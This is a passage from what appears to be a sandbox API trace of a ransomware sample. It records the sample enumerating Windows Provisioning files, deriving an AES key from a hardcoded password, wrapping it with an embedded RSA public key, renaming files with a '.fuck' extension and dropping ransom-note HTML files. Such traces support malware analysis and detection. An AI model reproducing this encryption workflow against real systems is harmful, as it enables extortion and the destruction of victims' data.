Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.049] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.049] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.gsg")) returned 0 [0240.050] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.fuck")) returned 0 [0240.050] CryptDestroyHash (hHash=0x28bee18) returned 1 [0240.050] CryptDestroyKey (hKey=0x28be958) returned 1 [0240.050] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.050] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.050] FindClose (in: hFindFile=0x28bf218 | out: hFindFile=0x28bf218) returned 1 [0240.050] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.051] AreFileApisANSI () returned 1 [0240.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.051] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.051] GetLastError () returned 0x5 [0240.051] GetLastError () returned 0x5 [0240.051] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.051] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0240.051] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\readme_back_files.htm")) returned 0xffffffff [0240.052] AreFileApisANSI () returned 1 [0240.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2aa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.052] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.052] GetLastError () returned 0x5 [0240.052] GetLastError () returned 0x5 [0240.052] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.052] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2893fb0 [0240.053] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.053] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.053] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.053] GetLastError () returned 0x5 [0240.053] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml")) returned 0x20 [0240.053] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0240.053] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.054] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.054] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.055] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.057] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.057] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.057] CryptHashData (hHash=0x28bee18, pbData=0x2856fc0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.057] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bee18, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28bf018) returned 1 [0240.057] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.057] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.057] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d6ed8) returned 1 [0240.058] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6ed8, dwCertEncodingType=0x1, pInfo=0x28cb138*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28cb168*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28cb170*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be558) returned 1 [0240.058] CryptEncrypt (in: hKey=0x28be558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.058] CryptEncrypt (in: hKey=0x28be558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6fe8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d6fe8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.058] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6fe8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.058] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.058] CryptEncrypt (in: hKey=0x28bf018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.058] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.059] CloseHandle (hObject=0xffffffff) returned 1 [0240.059] CloseHandle (hObject=0xffffffff) returned 1 [0240.059] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.059] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.059] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg")) returned 0 [0240.060] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.fuck")) returned 0 [0240.060] CryptDestroyHash (hHash=0x28bee18) returned 1 [0240.060] CryptDestroyKey (hKey=0x28bf018) returned 1 [0240.060] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.060] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.061] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.061] GetLastError () returned 0x5 [0240.061] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml")) returned 0x20 [0240.061] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.061] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.062] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.062] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.062] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.065] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.065] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.065] CryptHashData (hHash=0x28bf018, pbData=0x28571c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.065] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28bee18) returned 1 [0240.065] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.065] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.065] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d6f60) returned 1 [0240.065] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6f60, dwCertEncodingType=0x1, pInfo=0x28cadf8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28cae28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28cae30*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be958) returned 1 [0240.066] CryptEncrypt (in: hKey=0x28be958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.066] CryptEncrypt (in: hKey=0x28be958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d74b0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d74b0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.066] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d74b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.066] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.066] CryptEncrypt (in: hKey=0x28bee18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.066] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.066] CloseHandle (hObject=0xffffffff) returned 1 [0240.066] CloseHandle (hObject=0xffffffff) returned 1 [0240.066] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.067] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.067] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.gsg")) returned 0 [0240.067] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.fuck")) returned 0 [0240.068] CryptDestroyHash (hHash=0x28bf018) returned 1 [0240.068] CryptDestroyKey (hKey=0x28bee18) returned 1 [0240.068] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.068] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.068] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bf218 [0240.068] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.068] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.068] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28bee18 [0240.069] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.069] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.069] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.069] GetLastError () returned 0x5 [0240.069] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.069] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.069] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.070] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.070] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.071] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d7070) returned 1 [0240.073] CryptCreateHash (in: hProv=0x28d7070, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.073] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.073] CryptHashData (hHash=0x28bf018, pbData=0x2857010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.073] CryptDeriveKey (in: hProv=0x28d7070, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x282de78) returned 1 [0240.073] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.073] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.073] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d7648) returned 1 [0240.074] CryptImportPublicKeyInfo (in: hCryptProv=0x28d7648, dwCertEncodingType=0x1, pInfo=0x28caec8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28caef8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28caf00*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e83b8) returned 1 [0240.074] CryptEncrypt (in: hKey=0x28e83b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.074] CryptEncrypt (in: hKey=0x28e83b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d7538*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d7538*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.074] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d7538, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.074] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.074] CryptEncrypt (in: hKey=0x282de78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.074] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: 